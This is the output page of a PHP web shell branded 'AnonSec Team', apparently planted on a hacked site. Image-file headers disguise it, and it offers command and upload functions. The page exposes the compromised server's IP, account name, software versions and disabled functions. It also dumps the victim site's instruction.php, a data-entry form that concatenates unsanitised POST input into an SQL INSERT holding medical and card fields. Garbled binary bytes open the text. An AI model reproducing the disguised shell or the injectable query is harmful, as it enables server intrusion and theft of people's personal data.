����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������ Xzourt Bypazz

Upload your file


�����x������x������C�     ���C   ����<�d"�������������� �������}�!1AQa"q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������������� ������w�!1AQaq"2�B���� #3R�br� $4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������ ��?��S��(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(��ÿØÿà JFIF ÿþ;GIF89;aGIF89;aGIF89;a AnonSec Team
AnonSec Team
Server IP : 103.191.208.227  /  Your IP : 18.191.189.101
Web Server : LiteSpeed
System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
User : mhmsfzcs ( 1485)
PHP Version : 8.1.31
Disable Function : show_source, system, shell_exec, passthru, exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home/mhmsfzcs/vflyorions.com/../mail/cur/../../public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/mhmsfzcs/vflyorions.com/../mail/cur/../../public_html/instruction.php
<?php

include "db.php";
include "header.php";
include "sidebar.php";


$user_id=$_SESSION['id'];


   $a=0;
  $select = "SELECT * FROM `new_resume` WHERE `remark`= $a ORDER BY id DESC LIMIT 1";
   $result = $conn->query($select);
    while($row = $result->fetch_object())
         {
                             
             $pdf = $row->resume;
             $b = $row->id;

         }
              


if (isset($_POST['form']))
{

   $remark=1; 
   $query="UPDATE new_resume SET remark=? WHERE id=?";
   $stmt=$conn->prepare($query);
   $stmt->bind_param("ss",$remark,$b);
   $stmt->execute();
 

      $name = $_POST['name'];
      $country_1 = $_POST['country1'];
      $state2 = $_POST['state2'];
      $policy = $_POST['policy'];
      $medicine = $_POST['medicine'];
      $record =$_POST['record'];
      $sex1 = $_POST['sex1'];
      $zip2 = $_POST['zip2'];
      $assure = $_POST['assure'];
      $dosage =$_POST['dosage'];
      $customer =$_POST['customer'];
      $db = $_POST['db'];
      $country2 =$_POST['country2'];
      $p_inst = $_POST['p_inst'];
      $tablets = $_POST['tablets'];
      $email =$_POST['email'];
      $height= $_POST['height'];
      $phone2 =$_POST['phone2'];
      $holder = $_POST['holder'];
      $pill_rate = $_POST['pill_rate'];
      $res_address = $_POST['res_address'];
      $weight = $_POST['weight'];
      $alcoholic = $_POST['alcoholic'];
      $stm_name = $_POST['stm_name'];
      $cost =$_POST['cost'];
      $city1 = $_POST['city1'];
      $blood = $_POST['blood'];
      $smoker =$_POST['smoker'];
      $stm_code = $_POST['stm_code'];
      $shipping = $_POST['shipping'];
      $state1 =$_POST['state1'];
      $billing = $_POST['billing'];
      $past_surg =$_POST['past_surg'];
      $dob =$_POST['dob'];
      $total =$_POST['total'];
      $zip1 =$_POST['zip1'];
      $shiper = $_POST['shiper'];
      $diabletic =$_POST['diabletic'];
      $sex2 = $_POST['sex2'];
      $remark = $_POST['remark'];
      $phone = $_POST['phone1'];
      $city2 = $_POST['city2'];
      $allergiesd =$_POST['allergiesd'];
      $card = $_POST['card'];

   
      
      $query = "INSERT INTO forms(name,email,country_1,state1,policy_no,medicine,record_no,sex,zip,life_assure,dosage,customer,db,country_2,p_inst,tablets,height,phone2,name_p_holder,pill_rate,res_address,weight,alcoholic,stm_name,cost,city1,blood,smoker,stm_code,shipping_cost,state,billing_name,past_surg,dob,total_amount,zip1,shiper_name,diabetic,sex2,remark,phone1,city2,allergiest,card,pdf,user_id)
      VALUES ('".$name."', '".$email."', '".$country_1."', '".$state2."', '".$policy."', '".$medicine."', '".$record."', '".$sex1."', '".$zip2."', '".$assure."', '".$dosage."', '".$customer."', '".$db."', '".$country2."', '".$p_inst."', '".$tablets."', '".$height."', '".$phone2."', '".$holder."', '".$pill_rate."', '".$res_address."', '".$weight."', '".$alcoholic."', '".$stm_name."', '".$cost."', '".$city1."', '".$blood."', '".$smoker."', '".$stm_code."', '".$shipping."', '".$state1."', '".$billing."', '".$past_surg."', '".$dob."', '".$total."', '".$zip1."', '".$shiper."', '".$diabletic."', '".$sex2."', '".$remark."', '".$phone."', '".$city2."', '".$allergiesd."', '".$card."', '".$pdf."','".$user_id."')";
      mysqli_query($conn, $query);

        }
  

?>
<style>
  @media(max-width: 600px)
  {
    .hide{
      display: none;
    }
.hide1{
     display: show;
    }
  }
  @media(min-width: 601px)
  {
    .hide{
     display: show;
    }
     .hide1{
      display: none;
    }
  }

</style>
<style>
div.scrollmenu {
  background-color: white;
  overflow: auto;
  white-space: nowrap;
}

div.scrollmenu a {
  display: inline-block;
  color: white;
  text-align: center;
  padding: 14px;
  text-decoration: none;
}

div.scrollmenu a:hover {
  background-color: white;
}
.previous {
  background-color: #f1f1f1;
  color: black;
}

.next {
  background-color: #04AA6D;
  color: white;
}

.round {
  border-radius: 50%;
}
</style>
  <main id="main" class="main">

    <div class="pagetitle">
      <h1>Instruction</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item"><a href="index.php">Home</a></li>
          <li class="breadcrumb-item active">Instruction</li>
        </ol>
      </nav>
    </div><!-- End Page Title -->

    



    <section class="section dashboard">
      <div class="row">

        <!-- Left side columns -->
        <div class="col-lg-12">
          <div class="row">

            <!-- Sales Card -->
            <div class="col-sm-12" >
              <div class="card info-card sales-card"  style="">
                <div class="card-body">
                <br>
<p>
    We will provide you an image according to your package and you need to Type as it is, No need to change any thing. <br><br>
If you want to edit something you can go on edit option and you can edit the form from there.<br><br>
If you fail to submit the form in the sequence , the project will be rejected.<br><br>
After the completion of your work you need to go on Final Submission tab and need to click on excel tab .And you need to mail that format only.<br><br>
You need to save file as you have been received .<br><br>
All  file name should be given same as it is on the image file name and excel name.<br><br>
Computer dates should be in Indian standard time zone.<br><br>
Upper case or lower case (caps or small letter) should be typed respectively or else it will be considered under spelling mistakes.<br><br>
All the completed work should be sent to Quality@vflyorions.com before given time. after that Files will not be accepted, No Excuses will be considered here after.<br><br>
 Copy paste is not allowed so do not make any copy paste on form, it will get rejected due to copywright and conversion and no report will be given<br><br>
Without closing your window you need to make sure that you are loggin out the panel.<br><br>
If by mistake your window get close, you need to make an request on our email id i.e vflyorions@gmail.com . So that we can provide an another access to your work.<br><br>
</p>

                </div>

              </div>
            </div><!-- End Sales Card -->

            

      



  </main><!-- End #main -->

<script>
document.addEventListener('contextmenu', event=> event.preventDefault()); 
document.onkeydown = function(e) { 
if(event.keyCode == 123) { 
return false; 
} 
if(e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)){ 
return false; 
} 
if(e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)){ 
return false; 
}
if(e.ctrlKey && e.shiftKey && e.keyCode == 'C'.charCodeAt(0)){ 
return false; 
} 

if(e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)){ 
return false; 
} 
} 
</script>
  
<?php
include "footer.php";
  ?>

AnonSec - 2021